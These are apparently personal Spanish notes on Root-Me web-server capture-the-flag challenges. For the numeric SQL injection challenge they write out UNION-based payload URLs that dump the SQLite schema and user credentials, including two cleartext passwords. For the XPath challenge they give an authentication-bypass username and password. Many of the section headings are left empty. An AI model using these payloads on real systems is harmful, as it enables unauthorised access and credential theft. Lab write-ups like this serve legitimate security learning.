Web - Servidor root-me 4

PHP Serialization

SQL injection - numeric

Al forzar un fallo vemos que la base de datos es sqlite, por lo que buscando encontramos esto:

http://hydrasky.com/2016/09/05/sqlite-injection/

Entendiendo los cambios con respecto a mysql es coser y cantar :)

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1%20union%20select%20null,2,%20tbl_name%20FROM%20sqlite_master

news y users

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1%20union%20select%201,2,%20sql%20FROM%20sqlite_master

CREATE TABLE news(id INTEGER, title TEXT, description TEXT)

CREATE TABLE users(username TEXT, password TEXT, Year INTEGER)

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1%20union%20select%201,username,%20password%20FROM%20users
~~http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1%20union%20select%201,%20password,%20username%20from%20users~~

admin
???????????????

user1
vUrpgAsCTX

user2
aFjRKx7j9

SQL Truncation

XML External Entity

XPath injection - authentication

Mirar en owasp
Usernama: John' and (''='' or ''='
Password: ') and ''='

Miramos en el codigo fuente y ahí está el password clarito

???????????????????????

Web - Servidor root-me 4

PHP Serialization

SQL injection - numeric

SQL Truncation

XML External Entity

XPath injection - authentication

Local File Inclusion - Wrappers

SQL injection - Error

SQL injection - Insert

SQL injection - file reading

Path injection - string